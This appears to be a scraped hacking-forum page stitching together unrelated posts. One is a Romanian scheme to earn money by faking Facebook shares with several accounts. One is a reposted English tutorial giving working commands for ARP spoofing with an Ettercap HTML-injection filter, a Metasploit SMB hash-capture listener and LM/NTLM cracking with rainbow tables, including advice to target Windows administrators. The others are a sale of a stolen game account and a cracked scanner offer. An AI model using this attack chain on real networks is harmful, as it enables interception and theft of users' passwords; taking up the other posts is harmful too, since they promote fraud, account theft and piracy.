Leaderboard

Salut, Stiu ca titlul suna prea "sugabil" insa stapaniti-va. E pe bune, am facut deja banii o sa postez din paypalul meu. Vorbim de o metoda de a face 1$ in 5 minute doar dand share la un link pe facebook, plata se face instant. Poti face mai multi daca ai mai multe conturi de facebook. Vorbim aici de site-ul : The ShoeMoney Network My Passion Project I Have Been Working On - ShoeMoney scrieti-va datele reale, macar paypalul unde va plateste, apoi va intra un video, e misto de urmarit, are cam 5-6 minute....insa trebuie sa-l vezi pe tot ca sa poti trece la urmatorul pas, daca voi gasiti o metoda sa il dati la final, bravo voua eu nu mi-am batut capul, si asa nu fac nimic. La finalul videoului va pune sa da-ti share la un link de facebook. ATENTIE !!! Dati share, sa-l faceti public... apoi va deconectati de pe contul acela de facebook si intrati cu altul sa da-ti click pe acel link de pe facebook care l-ati shareuit. Dupa ce a-ti dat click, intorcetiva pe acea pagina si da-ti click pe verify now....sau ceva de genul...daca totul e in regula, verificati-va balanta de paypal, daca nu, stergeti cokieuri , reintrati..folositi alt cont, sau simplu rugati pe cineva sa de'a click pe amaratul ala de link shareuit. Proof : Povestea nu se opreste aici, poti merge mai departe dar cateodata te pune sa cumperi niste cacaturi...deci pierzi cumva acel dolar castigat... Acum faceti ce vreti...puteti face acest lucru de cate ori vreti..depinde cate conturi de facebook aveti. Sper sa va ajute, stiu ca nu e mult, dar e totusi 1$ pe un share de facebook. Spor. PS: Rog cine mai primeste banii, puneti un print sau confirmati cumva.

You can probably get by with leaving off that last part of the title and still succeed with this attack. Today we will be making a Password Pwn Stew. Add a little Ettercap (link), with a dash of Metasploit (link), a smidgen of password cracking with Rcrack (link) and Rainbowtables (link), and if required a pinch of Hashcat (link) to taste. You will have yourself some tasty pwnage. Note, your mileage may vary with this stew. I’m not Martha Stewart. Also the stew analogy ends here The latest version of Kali Linux includes the most current version of Ettercap (0.8.0). But if you like installing from scratch then see Compiling and Installing Ettercap. The latest version of Kali Linux includes the most current version of Metasploit. But if you like installing from scratch then visit the Metasploit Github page on setting up the development environment. You only need to follow the sections titled Apt-Get Install, Getting Ruby, Working with Git (ignore the forking part), Bundle install, and Configure your database. The latest version of Kali Linux includes the most current version of rcracki_mt. You could also follow this quick tutorial to get rcracki_mt binary. You will also need to download the HALMLMCHALL rainbowtables so visit that same tutorial. The latest version of Kali Linux includes an outdated version of HashCat. HashCat is free but not open source. You can download the latest binary from oclHashcat - advanced password recovery. You will need to download current video drivers for this version of HashCat. The following commands will work for Ubuntu 13.10 with an Nvidia card. sudo add-apt-repository ppa:xorg-edgers/ppa sudo apt-get update sudo apt-get install nvidia-331 nvidia-settings-331 Now we have all our ingredients. Sorry, promised the analogy would end. Let’s Get To It! What we will accomplish is the Address Resolution Protocol (ARP) spoofing of a local network segment, inject HTML traffic whenever a user surfs the Internet/Intranet, and force clients to request a Server Message Block (SMB) authentication back to a Metasploit listener that will force authentication with a known challenge request. With a known challenge, and if LanManager is still enabled in the environment (Windows XP clients) then a Rainbowtable can be used to identify the first 7 characters of the password. The remainder can be brute forced. If only NTLM or NTLMv2 is used you still have a hash that you can dictionary attack or bruteforce, preferably with a cracker that takes advantage of your graphics card i.e. oclHashCat. Setting Up Metasploit SMB Server # service smbd stop smbd stop/waiting # /opt/metasploit-framework/msfconsole msf > use auxiliary/server/capture/smb msf auxiliary(smb) > set JOHNPWFILE /tmp/john JOHNPWFILE => /tmp/john msf auxiliary(smb) > run [*] Auxiliary module execution completed [*] Server started. msf auxiliary(smb) > ARP Spoofing and Packet Filtering with Ettercap Note that when conducting ARP spoofing you will negatively impact the network traffic if you just spoof every host. Make your attack targeted so it does not raise any red flags or effect network performance. While this is outside the scope of this article you may want to target the workstations of any Windows Administrators to obtain their hash…for obvious reasons. Before we start Ettercap we need to construct a filter to parse the HTTP (port 80) traffic and inject a link back to our Metasploit listener. There are links at the bottom to the resources I used to create the filter and learn about how filtering works in Ettercap. Open your favorite text editor and paste the code below. # vim http-img.filter if (ip.proto == TCP && tcp.dst == 80) { if (search(DATA.data, "Accept-Encoding")) { replace("Accept-Encoding", "Accept-Rubbish!"); # note: replacement string is same length as original string msg("zapped Accept-Encoding!\n"); } } if (ip.proto == TCP && tcp.src == 80) { replace("<\/body", "<img src=\"\\\\<Metasploit_Listener_IP_Address>\\pixel.gif\"><\/body "); msg("Filter Ran 4.\n"); Once the file is saved you will use an Ettercap command to convert the code into the binary Ettercap will understand. # etterfilter http-img.filter -o http-img.ef etterfilter 0.8.0 copyright 2001-2013 Ettercap Development Team 12 protocol tables loaded: DECODED DATA udp tcp gre icmp ip arp wifi fddi tr eth 11 constants loaded: VRRP OSPF GRE UDP TCP ICMP6 ICMP PPTP PPPoE IP ARP Parsing source file 'http-img.filter' done. Unfolding the meta-tree done. Converting labels to real offsets done. Writing output to 'http-img.ef' done. -> Script encoded into 15 instructions. Copy the binary to the Ettercap share folder. #copy http-img.ef /usr/share/ettercap (may be /usr/local/share/ettercap) If you know your target you can start Ettercap from the command-line to begin sniffing, ARP Spoof, and filtering the traffic. # ettercap -TqF http-img.ef -M arp:remote /<target_ip(s)>/ /<gatewayIP>/ -i eth0 If you prefer the GUI then follow the screenshots found here. This screenshot shows Ettercap when the filter modifies the traffic. Below is an example capture of the SMB authentication in Metasploit msf auxiliary(smb) > [*] SMB Captured - Fri Jan 17 22:14:51 -0500 2014 NTLMv2 Response Captured from 192.168.0.108:1282 - 192.168.0.108 USER:Owner DOMAIN:COMPUTER-2554 OS:Windows 2002 Service Pack 3 2600 LM:Windows 2002 5.1 LMHASH:Disabled LM_CLIENT_CHALLENGE:Disabled NTHASH:09af7e143207525cfc17e4037a1f0a54 NT_CLIENT_CHALLENGE:0101000000000000205e4972fb13cf01547f10c301861ef800000000020000000000000000000000 The last step we need to accomplish is crack the hash obtained. The example above has LMHASHing disabled. For demonstration purposes we will utilize LM and NTLM hashes captured during an actual penetration test. One of the Metasploit options we set was JOHNPWFILE. This saves all hashes obtained in the format John the Ripper uses to crack passwords. It is also the format used by oclHashCat. But before we use any offline bruteforce tools we will demonstrate cracking NetLM using the example below. The username and domain have been removed to protect the guilty. Username::WINDOWSDOMAIN:<b>1d006cfe2f3a9f72</b>ce4894c546c4beea53032ef5db28da08:b528f7d46e130e678c2e65a656b76b685f8dad9152d02c3f:1122334455667788 We will use rcracki_mt and the HALFLMCHALL rainbowtable to crack the first 7 characters of the password. This requires the first 16 digits of the NetLM hash – 1d006cfe2f3a9f72 # cd ~/tools/rcracki_mt_0.7.0_linux_x86_64 ~/tools/rcracki_mt_0.7.0_linux_x86_64# # ./rcracki_mt /media/edge/3TB/Passwords/Rainbow/HalfLM/*.rti -h 1d006cfe2f3a9f72 Using 1 threads for pre-calculation and false alarm checking... Found 4 rainbowtable files... halflmchall_alpha-numeric#1-7_0_2400x57648865_1122334455667788_distrrtgen[p]_0.rti reading index... 13528977 bytes read, disk access time: 0.00 s reading table... 461190920 bytes read, disk access time: 0.00 s searching for 1 hash... plaintext of 1d006cfe2f3a9f72 is GOOSE00 cryptanalysis time: 0.06 s statistics ------------------------------------------------------- plaintext found: 1 of 1(100.00%) total disk access time: 0.00s total cryptanalysis time: 0.06s total pre-calculation time: 2.34s total chain walk step: 2876401 total false alarm: 31 total chain walk step due to false alarm: 68140 result ------------------------------------------------------- 1d006cfe2f3a9f72 GOOSE00 hex:474f4f53453030 Now to bruteforce the remaining portion of the password using a Ruby script that comes with Metasploit. # cd /opt/metasploit-framework/tools /opt/metasploit-framework/tools# ruby halflm_second.rb -n 1d006cfe2f3a9f72ce4894c546c4beea53032ef5db28da08 -p GOOSE00 [*] Trying one character... [*] Trying two characters (eta: 12.858231544494629 seconds)... [*] Cracked: GOOSE004# Using the script to brute force up to 3 characters is about as far as you want to go with the halflm_second.rb script as you see in the example below. That is a ten character password which is not too shabby. As you see below a longer password will not be cracked in a reasonable amount of time. Especially if you are on a penetration test with a limited testing window. Username2:WINDOWSDOMAIN:1c6e27fb87220408930041fca2d43260f3831c004b1486d8:eab0974cad5cf20ab14e0d264865973bbffc0e5ca4725e33:1122334455667788 /opt/metasploit-framework/tools# ruby halflm_second.rb -n 1c6e27fb87220408930041fca2d43260f3831c004b1486d8 -p RYANCHI [*] Trying one character... [*] Trying two characters (eta: 10.010079860687256 seconds)... [*] Trying three characters (eta: 2292.3082880973816 seconds)... [*] Trying four characters (eta: 524938.5979743004 seconds)... An eleven (11) character password will take 6.075 days. I have no idea how long a 12 character password would take but know that it is exponentially longer and not even scripted into halflm_second.rb . So oclHashcat and GPU password cracking to the rescue! To continue the saga visit this tutorial on using Hashcat to bruteforce the second half of the password. Great sites to learn about Ettercap Filtering Fun with Ettercap Filters "Invincibility lies in the defence; the possibility of victory in the attack" by Sun Tzu: More On Ettercap plus Filter examples ETTERCAP - The Easy Tutorial - Man in the middle attacks Sursa: Password Pwn Stew – Ettercap, Metasploit, Rcrack, HashCat, and Your Mom » jedge.com Information Security

salut, vand cont de lol eune cu 75 skinuri, ofer dovezi prin orice metoda doriti,astept pm cu oferte,da contul nu este al meu , dar posesorul de drept nu mai are cum sa-l i-a inapoi a incercat si cu tichet , oricum am asteptat aproape 2 luni de cand l-am luat deci chiar nu are cum sa-l recupereze, schimbul se va face prin intermediul unui admin/moderator/v.i.p deoarece nu vreau tepe P.SP-> am uitat sa spun ca dau si codul pentru a schimba emailul(era totusi evident) si daca mai aveti nevoie de detalii, intrebati

netsparker web application scanner ! last version ( 4.0.1.0 ) with crack . for rstforum members virus scan download link * sorry for download link ! virustotal and download link updated . Good Luck . !